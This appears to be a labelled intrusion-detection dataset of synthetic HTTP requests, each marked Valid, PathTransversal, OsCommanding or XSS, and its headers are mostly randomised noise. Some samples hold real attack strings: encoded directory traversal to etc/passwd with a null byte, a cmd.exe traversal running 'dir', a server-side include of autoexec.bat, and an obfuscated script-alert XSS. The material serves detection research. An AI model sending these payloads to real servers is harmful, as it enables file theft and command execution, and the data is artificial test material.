TE: chunked;q=0.3,chunked
Trailer: Trailer
User-Agent: <!--  #include  virtual="d:\windows\autoexec.bat"   -->
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ak=$qu&stodhEm=tmJNLvPyd&hpo3mpteun=ri$xhr&ehenc=dceae0pediygo6r&Ab=59040&lesmn1oao=eyoTmltmx&2selt=bbnekkltsb;r&se=64&s1e=cmbeXwHnexriiyeet&an5aso6toscoIZ=<y%drop~ nodeda\-n'tttlikexnl&uw4bdpopeijiqce= ratmp&8ofodinrrdhot=eo~snlRl

End - Id: 40702
Start - Id: 46219
class: PathTransversal
GET /ex/meihichojeatbke3d7e/lm7ckXkhw/@8.css?mTinr=i0e%26processing-instruction&ncgtuIVdhd=nstndls9nb8niol7mz&0he7p=lp_8uvVp&aEbesertgh=5img%2F&v.Hbwf=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&a2riu=4732&edser=mooas%3D&Mv2bthiedrhe=8886 HTTP/1.1
Host: 219.3.189.168:2
Connection: gldo
Accept: image/gif
Accept-Charset: ks_c_5601-1987;q=0.5, us-ascii;q=0.8, iso-8859-8, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 184.19.40.250
Cookie: xbxW@htaccesrcpN=713213;UrIm=cpe1nSoe8 ;vnEZk=594647459
Cookie2: $Version="6"
Date: Sat, 17 Jun 06 16:29:53 CET
ETag: ".vLhO8Z0DK_yY@mG"
Expect: tiesfh=tc5ceo;tebom
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Thu, 23 Apr 09 11:08:40 CET
If-Unmodified-Since: Wed, 05 Mar 08 22:16:58 GMT
If-Match: "jVay4Kw5uNDkQbsU0J"
If-None-Match: "o4BDjPIariidaGzOlPh"
If-Range: Fri, 16 Nov 07 24:52:34 CET
Max-Forwards: 1
MIME-Version: 5.5
Pragma: bt='lptreitl'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Digest username="2npn"
Range: 63-8582,2-821656
Referer: /0rHml/10csc8e/a0hd9dp.asp
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (compatible; MSIE 9.4; Open BSD i386; mkjHfas3t5; rORf; Al97ttvuTe)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: eeesu; aAMy=6hnpsn5
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46219
Start - Id: 43784
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 219.30.134.93:80
Connection: re0l
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=31950
Client-ip: 15.226.120.35
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="222"
Date: Sat, 05 Nov 05 16:51:45 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 25 May 09 15:09:59 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 6
MIME-Version: 5.3
Pragma: 8j='g'
Proxy-Authorization: Digest opaque="leSssie"
Authorization: pTeest obeyj=ge1a
Range: 10571-03
Referer: /sre9i4b/azt5/cuoE.nsf
TE: trailers,chunked;q=0.2,gzip
Trailer: From
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 4.5; Aq-yl; rv:2.9.5) Gecko/04252865
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 154x454
Via: FTP/7.1 www.zuebkb.css
Transfer-Encoding: gzip
Upgrade: rkdos/5.2, o56Tt/8.3, Tai2zk/6.6, zoWhhE/4.5
Warning: 848 www.ellxsil2.jpg "n5rnlcviw" "Wed, 23 Mar 05 14:33:15 GMT"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43784
Start - Id: 21978
class: Valid
GET /rca/aE7/inhqGIotzvtgs4e/Epst/tV5ZNnImD1J-pdwr/eO7wxRUY3lALi_sD.aspx?0a1=3561392570&rflmse=901646830&huneabiETlI5e=s9i&2tNadfeaqz=tj&8i8iahwe4P=3029595&visen=rsrNhnt&mugt=2840002415&obleh=otes&7oajItS3toQh=s4&lh32hwdhr=k&q6lsrNtitnerhj=ahliynodecnta-+%2B%5C0ybina3&atseSe=maTh2 HTTP/1.0
Host: 15.141.109.60
Connection: keep-alive
Accept: audio/*, video/quicktime
Accept-Charset: windows-1252, iso-8859-7, x-mac-arabic;q=0.0, windows-1253, x-mac-arabic
Accept-Encoding: identity;q=0.7
Accept-Language: cNatt-ivR
Cache-Control: only-if-cached
Client-ip: 35.13.160.121
Cookie: pao=ea;etut=ge7ddropm4
Cookie2: $Version="4"
Date: Thu, 02 Jun 05 01:15:11 CET
ETag: W/"w8_ObORHhZaf2C@l8y3"
Expect: 100-continue
From: hso9@seTndeScl.it
If-Modified-Since: Sun, 16 Apr 06 07:13:42 GMT
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: "2STBwOb9Z2bY._4knx"
If-None-Match: *
If-Range: "SdYZ5JCkE53Bftss"
Max-Forwards: 519
MIME-Version: 9.4
Pragma: tii983f4=ln2FwipL
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: Digest nc=B3739F87
Range: 2-874,8-,3113-623962
Referer: http://sdfnnayn.de/iscr.dll
TE: trailers,gzip,chunked
Trailer: Expect
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 7.1; rb-mL; rv:9.0.0) Gecko/14293006
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0095x515
Via: 5.8 221.203.140.203, HTTP/5.8 145.56.52.55, 5.1 78.114.233.170:2
Transfer-Encoding: deflate
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 3.21.36.129
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21978
Start - Id: 11908
class: Valid
GET /eBl4/oaf/ts/1ttyi5boclsso5dir/cygDe/rhhDutlaojnr/casetmStal.pl?hdiv@C=so+%3Fnewheree+2ookndhttpttd%28&eiebp5g=tBKD&im4leiMasjin=d0y&YdBhwDhtpass=5600&garpo07omghudyt=746 HTTP/1.0
Host: 114.55.146.55
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: etiROmyt-ezhitale
Cache-Control: no-cache
Client-ip: 141.7.159.107
Cookie: syueuotpsnnuT=+;ZadoxrnNTPel=5293;hela5ibhudtbuue=iat;omuipOlitnnt=liRm;HHgfxtermAa2LIH=OEgbetween6ifnwee6
Cookie2: $Version="5"
Date: Mon, 14 Jul 08 03:22:05 CET
ETag: "Ko8OgPUlO7.1e0o"
Expect: 100-continue
From: cwtdea@hotshneub.biz
If-Modified-Since: Sun, 14 Dec 08 04:50:06 UTC
If-Unmodified-Since: Mon, 27 Dec 04 21:25:14 GMT
If-Match: "aoF0Q3UzL2OZ7lL2"
If-None-Match: *
If-Range: Sun, 11 May 08 21:23:14 UTC
Max-Forwards: 110
MIME-Version: 7.3
Pragma: eb='t2dg'
Proxy-Authorization: Digest opaque="ehheia"
Authorization: toro mrSeeeE=qg7awnt
Range: 91-,70-
Referer: http://itcft.be/tleicz.rar
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 8.6; tS-en; rv:5.3.9) Gecko/58214406
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: in8ayo/5.8 www.eeonoe.tiff
Transfer-Encoding: fnLt
Upgrade: oail/1.2, webxe/2.0
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11908
Start - Id: 9411
class: Valid
GET /syQqVxY/6odRXgB/ieeaAtl/6GMXH3vLuKYIoIO/s9soaetafiXaj/7mtth0mdeedcdeDdrat/g7staQSkWbYqWj/aMdH73sY.js?itttennbunist=42&e4c4l=eupdatetana&eXcTuxdSEeclm=6&2pe=%7Ckes&em1iteRiEb6e=iA&eri1x3ArYetr=txodghstosrn&rntntnaecSE=cunoea0Basshhh HTTP/1.0
Host: www.0sew.net
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: rH-gwg;q=0.5, Wz-a4o, qnuf-9, so6rhn-cam, NP-tuqp
Cache-Control: et9namwk='rteupssx'
Client-ip: 92.24.119.207
Cookie: vNF7=0tstis9;ntai17n=9s;0aoh4ej=0drapenrs60connectM o;ZGyhHX6Jdocument=liieivee;ad0=oHDqW;s5=aynmNKou3e2i
Cookie2: $Version="31"
Date: Wed, 19 Jan 05 15:26:21 GMT
ETag: "rL6DyzDqGZ.Tym0P"
Expect: 100-continue
From: xx0art8v@nico4.be
If-Modified-Since: Thu, 24 Jan 08 17:44:37 UTC
If-Unmodified-Since: Sun, 12 Dec 04 14:32:55 GMT
If-Match: "RA@zOEOJqPEQYbo-T"
If-None-Match: *
If-Range: "5Jnaa2@puqOElMqUE"
Max-Forwards: 35
MIME-Version: 6.5
Pragma: c6ivuEe='ff8ipsu'
Proxy-Authorization: NTLM c1BjdXpvZWxBaHlhbGFleHRvdHg0aXRJbmlhbmFlbDJyaWV0bHVpNXNiYXRzaQ==
Authorization: NTLM ZW84NmkxY2JpaG9kc3JpbjVPaG5nRWxzc2VudGhudWlMcnluaGNlb20xNm9uZXI=
Range: 15-64208,-25827,5343-67434
Referer: http://Terc.gov/efrfxue/ANbmco/aona.cgi
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: osQabtift (oED.g1va; eMpqD7ROf.; jxNeJWsj; nVH6A4rHc)
UA-CPU: Sparc
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 064x637
Via: oqoi/4.1 www.qimd2oT.css
Transfer-Encoding: identity
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 337 83.238.5.69 "erpbowppr" "Thu, 29 Sep 05 23:26:00 CET"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9411
Start - Id: 31155
class: Valid
GET /nriV.gif?ioWo=Eennnoom9%24wK&L_oZhduidMBcw=ueilecho&s2i3=37150&eearlboesrailu=cmdde%3FA&tr0a=421&9sezac6be=73amS4 HTTP/1.1
Host: 236.60.86.43
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.1
Cache-Control: hxxt=atseetAs
Client-ip: 23.174.197.157
Cookie: mhtpass_8T7mail2Ar1=rmute>/ nSdt/pW;l7hn=oG;ctatrEu7sSEdrn=1680;maiiurni=856785
Cookie2: $Version="8"
Date: Tue, 15 Nov 05 21:11:08 GMT
ETag: "lOdYqY43p4_4Icp@U"
Expect: 100-continue
From: eHyxdc@nttofeahoi.net
If-Modified-Since: Tue, 23 Mar 04 14:30:00 GMT
If-Unmodified-Since: Mon, 14 Apr 08 21:22:17 GMT
If-Match: "igJciaQmS00hBl9TS"
If-None-Match: "duvGDip7ze..i-H"
If-Range: *
Max-Forwards: 8584
MIME-Version: 4.4
Pragma: te='xhtoe'
Proxy-Authorization: Basic bmlubzpoc3R1RWk5
Authorization: Basic SHJ3c3I6aWEwd2NlcWU=
Range: 41-,7530-978
Referer: /nldnn/tkwv5tsA/nuc3o7.msf
TE: trailers,trailers,chunked
Trailer: Authorization
User-Agent: ienfhmrgnnafe2An
UA-CPU: StrongARM
UA-Disp: 342,300,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 006x0158
Via: FTP/5.8 www.mthdEe.html:5382
Transfer-Encoding: identity
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31155
Start - Id: 30577
class: Valid
GET /iX4mkH6AhqrCw/hesDstAg/nxq85/Y-hGtNeGBRF-/txnn2ae43ttiOnPon3/sat24vP.jpeg?almet=sar&katgrr45oiecyso=e%24%2Fis&iroteda=dd366n5oufX&t2=idiv%3Eho&3a5o=0780117645&4qUa2aHw2td8f=9935&qoR7Pr=172228&hen=60&imgrd3j7jmevalKJ=89&EhDtasmoa=tamft&ri=b6senH&kfds=8 HTTP/1.0
Host: 50.202.78.250
Connection: close
Accept: application/zip;q=0.0
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=908
Client-ip: 61.132.5.63
Cookie: Ferolwi=lnnJYeuJSWB;iMguSJcmdE_=tcF2enR5na8qnt1;4Ylib05hb=aFIlR@;elohe4nel=6494346
Cookie2: $Version="2"
Date: Thu, 15 Jun 06 09:15:25 UTC
ETag: "85sRP9tymf1-l02eG@9"
Expect: aina8
From: hmin@oar8.com
If-Modified-Since: Sun, 12 Sep 04 06:33:42 GMT
If-Unmodified-Since: Sun, 14 Oct 07 17:36:08 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Dec 05 23:19:23 UTC
Max-Forwards: 685
MIME-Version: 9.2
Pragma: irE='jlhc'
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: ocpst nrGe=Sflu
Range: -185
Referer: /raean/dcnj/ons070s/mqgta/nsTX.dll
TE: deflate;q=0.2
Trailer: Warning
User-Agent: eAstNte2/1.0.3.2.2
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: 2.5 100.180.96.213:234, 5.1 94.14.188.21, FTP/0.6 25.117.111.204
Transfer-Encoding: deflate
Upgrade: iicoun/9.2, tlnhD/8.4, i5ise/8.9
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 132.1.3.118
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30577
Start - Id: 28375
class: Valid
GET /orgJEG.5lnxr./rh62/l6qssvMpd-W/t7fghitpl/0qlgNrinsertJ/Kaccess_logX.Zh4p7Zp7.php3?znetat5atrStAe=58492&0ddEpyr3htpasswr=dMOqC5&dU8gTL.cR=7900068&iennlen=37192&bii9ord=ezte5stylemqNxi%25%3F&g3t=449733 HTTP/1.0
Host: 170.233.117.57
Connection: mArisec
Accept: video/*;q=0.9, audio/basic, video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.9, deflate;q=0.0
Accept-Language: inn1-NAruaye;q=0.4, her-ehuuaoel, o-ri, i8c-h8n;q=0.9, taIm-oi
Cache-Control: no-transform
Client-ip: 230.148.204.47
Cookie: n2eeznamb=06994878;EEhutinnttsexn=3eLDC2qO3;UHdllwe9rs=aak3znPirfCV;Snst=rhomei0aatdr;SsoTSn=p%eumheptThs;eabedcbathvepd2=e?s0
Cookie2: $Version="225"
Date: Wed, 07 Dec 05 03:24:44 UTC
ETag: "j7MoQxXG4g6fvlLw6Q"
Expect: 100-continue
From: Airnplia@ncmEshgh2y.com
If-Modified-Since: Mon, 21 Jul 08 22:00:33 GMT
If-Unmodified-Since: Thu, 11 Mar 10 02:55:06 CET
If-Match: *
If-None-Match: "elWmFQd759_tZ4-pu"
If-Range: Mon, 10 Mar 08 17:34:45 GMT
Max-Forwards: 45
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: NTLM emVtelRMM2VFbmlmNGxJMmV6eUFzaWNnbGhsTmVlZHI=
Range: 665026-
Referer: http://www.ewmeden.com/iiof4/rhatt/xctaen.mdb
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: o@vdmMt http://www.gifeest.gov
UA-CPU: PowerPC
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 965x809
Via: FTP/5.4 57.20.31.40:92
Transfer-Encoding: gzip
Upgrade: oyEin/2.3, temss/5.1, eetil/2.9, fta/0.0
Warning: 347 147.194.234.174 "AYtgenf8eueNtskYttu" 
X-Forwarded-For: 162.179.185.64
X-Serial-Number: 7465297368
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28375
Start - Id: 15975
class: Valid
GET /gqo@k_ed8Q/kScy3tE0w1WzS.4s9v/dc59EQqjk/noit/hdgc.jpg?1eere=c23DB%40-7aYms&pm=2&Tfmoot=8t%40pc9ij4L&dSo=eg80%29L&EvwatueAetjrbsu=hOK4UNR5&YqR4Nhome9=6i%3Eroej-+ts%3EGi+&Aena5uuSu0na=lgvyOnrVtf0u&xvc=oifceitgiy+&tva84=973186&iCroeecLst=xap HTTP/1.1
Host: 138.218.54.149
Connection: keep-alive
Accept: application/postscript;q=0.9, audio/*;q=0.5, image/jpeg
Accept-Charset: windows-1251;q=0.5
Accept-Encoding: identity, compress
Accept-Language: *;q=0.6
Cache-Control: o1dthe='radR'
Client-ip: 31.122.98.168
Cookie: h6=zpvien;6ued=ei@e;6ecooy=ia;es;te=otrSfemrSig;00Rxein9kUehrE=l1f
Cookie2: $Version="99"
Date: Fri, 15 Jan 10 15:48:12 UTC
ETag: "LXw6l.XWchVrf6vX"
Expect: 100-continue
From: hxmcceeo@ejAn.gov
If-Modified-Since: Fri, 10 Dec 04 22:58:44 GMT
If-Unmodified-Since: Sat, 04 Jun 05 10:24:02 CET
If-Match: "34IJAKfG7qXm7oGZc"
If-None-Match: *
If-Range: Tue, 05 Dec 06 05:19:06 UTC
Max-Forwards: 0622
MIME-Version: 4.4
Pragma: eeno=redh5ad
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: NTLM ZVlhYWNvaWpuZXRvZW9oYW1pZ3RxT2Ruc3dwZXB0ZUk1bkM=
Range: 08-06,-75180
Referer: http://www.lmwoh.fr/ad0r/bkEf/litTjiag/cttw/Idzncse.conf
TE: chunked,chunked,deflate
Trailer: User-Agent
User-Agent: Mozilla/7.3 (X11; U; Linux i386 6.9; sn-Na; rv:6.1.4) Gecko/77030284
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 221x576
Via: 8.5 www.sefToawX.jpeg, HTTP/4.9 www.TeTuq.gif, 0.5 81.86.198.4
Transfer-Encoding: identity
Upgrade: draal1/9.2, 8stse/6.9, tvz7o/8.5
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 167.197.130.101
X-Serial-Number: 47727
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15975
Start - Id: 21621
class: Valid
GET /xHnNwNL-sFDXxmyu/DAIqv2wSIQr8/enrraetuTedCeh/llqfdnberttatieJE/0ygroup byceydEbzw/ssw2rnyidfxl/4he/oymKSe54Bqi6_5/processing-instructionpE/9Y_mV65UOSZoOP/nlm2s1aaReoL.swf? HTTP/1.1
Host: 166.46.215.25:54163
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, gzip;q=0.4, identity, deflate, gzip
Accept-Language: *;q=0.2
Cache-Control: apaet='Ly'
Client-ip: 125.106.235.5
Cookie: 3u5lixdRsmE3o=oHseeeo;ikisdrnh5oc=nrcp%apb'
Cookie2: $Version="682"
Date: Fri, 24 Apr 09 24:09:29 UTC
ETag: "7ly7eaghEhD_adE97d"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sun, 15 Apr 07 24:15:46 CET
If-Unmodified-Since: Wed, 23 Aug 06 05:40:28 CET
If-Match: "qpNZStyom8FCp1OjHhE"
If-None-Match: *
If-Range: Sun, 04 Apr 04 13:55:31 GMT
Max-Forwards: 6
MIME-Version: 5.4
Pragma: I9uinec=c
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: Basic emloc3JFOm9jRW1h
Range: -924,18744-98395
Referer: /oSnaas/ny29ecot.tiff
TE: chunked
Trailer: Accept-Encoding
User-Agent: 0itnCn/5.5.4.0.3
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 767x833
Via: 4.8 www.ixti05w.htm, 3.5 www.apibnrH.tiff, tefq/8.7 www.ribmrSH.tiff:11628
Transfer-Encoding: gzip
Upgrade: codse/2.4, Orte/3.9, dttr/7.6, cTjdn/1.0, iaatOs/2.1
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 0418048557333038
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21621
Start - Id: 24546
class: Valid
GET /wiTZm/boot.inibLk/3aenhige9e8tfh/lljcgewHhSaseua/1l0bPnesemlt/p7TiH-rNX.@ZZv.mdb?f4=60977116&At-P=4539193&WUconnectfQV-=H%29ree&l7s=hno&Aaexntwtedi=2&isttt1swW5E9=r&fetaet5cul0j=687&4iiaAtlrEs=lriepESls&kneseeebm=xmly&erpaejecElos5=02&iifbtai=522951715&ihrmbi=1744397&aeepar8emayuntt=aue0&im=e+noEnatSNibnxp_%40%3Bnre HTTP/1.0
Host: 22.244.104.23
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-8, windows-1252;q=0.4, iso-8859-7;q=0.4, koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.196.246.18
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Wed, 07 Oct 09 11:41:26 GMT
ETag: "x1n0fyS6m54WqR@i_K0z"
Expect: r7ndcs
From: 1ulNhsn@sSweeqd.gov
If-Modified-Since: Tue, 19 Apr 05 12:24:26 UTC
If-Unmodified-Since: Sat, 16 Dec 06 13:28:25 UTC
If-Match: *
If-None-Match: "VivOGIK099Me.9CR4U"
If-Range: *
Max-Forwards: 722
MIME-Version: 8.9
Pragma: ceyark=g
Proxy-Authorization: oyTb n3auus1d=esdje3nn
Authorization: NTLM aXN0ZGllWXBpZWhjbGxvaXh4bmR4dGVlcnRkZWhoYTNuZWI4TWVyc3Qxcmhz
Range: -001651,-8
Referer: /fn9m/nanrud/ktif/ejDi/tMrgsa.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.5 (Windows; U; WinNT 8.2; mg-4s; rv:4.2.4) Gecko/39292113
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: 1.7 www.oidopt.jpeg, FTP/0.1 101.42.3.117, FTP/7.4 www.rUrtEqm.png:68
Transfer-Encoding: identity
Upgrade: tfDtgt/3.8, s7e/0.3
Warning: 900 74.109.202.46:6 "oanoeaj2nll" "Sat, 13 Jan 07 24:32:28 GMT"
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 185732331097779
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24546
Start - Id: 47511
class: XSS
GET /vdceTgaRtneEbo/eoi/2stmmam9ioidoWidein/arq17v.Qp97caDE/-WG63ipasswdT/rT5Wzc3G/L8uaZYchildtM/US-uhH9homeR5/3QDsARq7http8GShavingzboot.ini/eVcGkSfQEN/1TjJlM5/cCW.asp?Ibsxstahcm=8&mxelt=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Balert++%28%27iejcnpz8t%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&iE=Log1h&lsrseii3nvalZ=85 HTTP/1.1
Host: 154.188.29.155
Connection: Steir
Accept: text/*;q=0.2, text/html, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8dm0-s;q=0.6
Cache-Control: no-store
Client-ip: 218.133.141.85
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="7"
Date: Mon, 30 Oct 06 06:46:46 CET
ETag: W/"T.nifG87SHPiwpM4.IO4"
Expect: tnareq2o=fue64Ubi
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 13 Apr 06 15:53:13 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:44:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: lRetr='hhobli'
Proxy-Authorization: Digest nonce
Authorization: NTLM b29ycWxlc3M2U0lnNUk2SXdOcmNpYWVOdGZ0YWFlbW9mYWtpd2VlYWlybzdmZGc=
Range: 20-409392,508-532
Referer: http://sm9spI.net/lani/sjmuntso.css
TE: gzip;q=0.1
Trailer: Range
User-Agent: Mozilla/3.2 (compatible; Konqueror/2.6; Mac OS X; anth; y73tn1w; se8eRc3h)
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 5.2 www.Va6rl.html:4304, 9.8 73.29.81.37
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 212.215.29.78
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47511
Start - Id: 43037
class: OsCommanding
PUT /yTRI@eG4uXLXCcH-T/l@BB@hZ1VRIqzPP5/i3dneVitrambJzLhnw/ramirt8Bno615wo7O/pITOOkf4/eFXqb-nQLFpWEUrs/oaal1/echo-/Fo/soeynLnwsebh/nenlA9qteuue/eXECVTG2d0qe1ORM@fu.php? HTTP/1.0
Content-Length: 312
Content-Language: teipw
Content-Encoding: gzip
Content-Location: /esreuwmo/nmnrtyoa.jsp
Content-MD5: clBGczZlZW5hb3RwZTI5Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Mon, 16 May 05 03:55:47 UTC
Host: www.heeOmt.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.3, macintosh, utf-8;q=0.0, iso-8859-9;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: i='iligB'
Client-ip: 31.142.70.36
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Sat, 19 Sep 09 20:10:44 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Mon, 16 Jan 06 19:38:22 UTC
If-Unmodified-Since: Tue, 22 Aug 06 20:48:53 CET
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: 3=cfce
Proxy-Authorization: Digest opaque="ais18i"
Authorization: NTLM aTRhbmVybHRzcXJlZVR0M3RzZTA2ZGVPZXpkZmlhdGU=
Range: -98633,070828-,-9277
Referer: /fnlcat/ydsarhDn/9ecd/rsWhm58u.exe
TE: deflate
Trailer: Connection
User-Agent: tcrr/2.4.8.7
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 3.5 www.ClIeoir.js, 4.5 19.57.102.35:4089
Transfer-Encoding: rnrdhh; xichelR=urjza
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

